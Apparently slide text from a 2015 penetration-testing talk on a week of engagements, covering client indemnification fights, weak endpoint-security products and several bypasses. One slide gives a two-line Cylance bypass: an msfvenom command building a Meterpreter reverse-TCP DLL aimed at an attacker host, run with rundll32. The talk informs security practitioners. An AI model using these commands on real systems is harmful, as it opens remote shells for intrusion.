Copyright © 2015
Everything you wanted to know..
One week in the life
Wow…. 35 min?
Phew… Ok…..
Lawyers… Oh God…
• Constant fights on Indemnification
• Need to have indemnification clause
• They will fight you almost every time
• Need for analogies
• Let's Make a Deal
Advanced Endpoint Security
• We are seeing Vision (Hi Dave!!), Cylance, Bit9 (to a lesser extent), CrowdStrike, etc. on more tests
– Most are train wrecks… Total train wrecks…
• White listing is a thing… Get used to it
• Smaller organizations doing much better
• Larger orgs getting it… Yea, scary…
• Do not base purchases on a company's marketing budget…
Cyfort bypass - Derek
Last week
Cylance bypass - Joff
Yesterday
• Two lines…
• # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=y -f dll -o msf.dll
• C:\> rundll32.exe msf.dll, Control_RunDLL
• Yea… That’s pretty much it…
• What does this mean?
The Need for a Good Password Set
YESSS!!!
OWA/Office365 2FA bypass - Beau
Today
Customers Watching Us
Happens all the time…. Sally
• While we test….
• Changing things on the fly
• VPN setup, test PowerShell… First thing the customer takes from us…
Web Proxy Whitelisting Bypass
Yesterday… Brian
Big thanks to @harmj0y!
Thanks!
• John Strand
– @strandjs
– 303-710-1171
– Ed’s new shirt!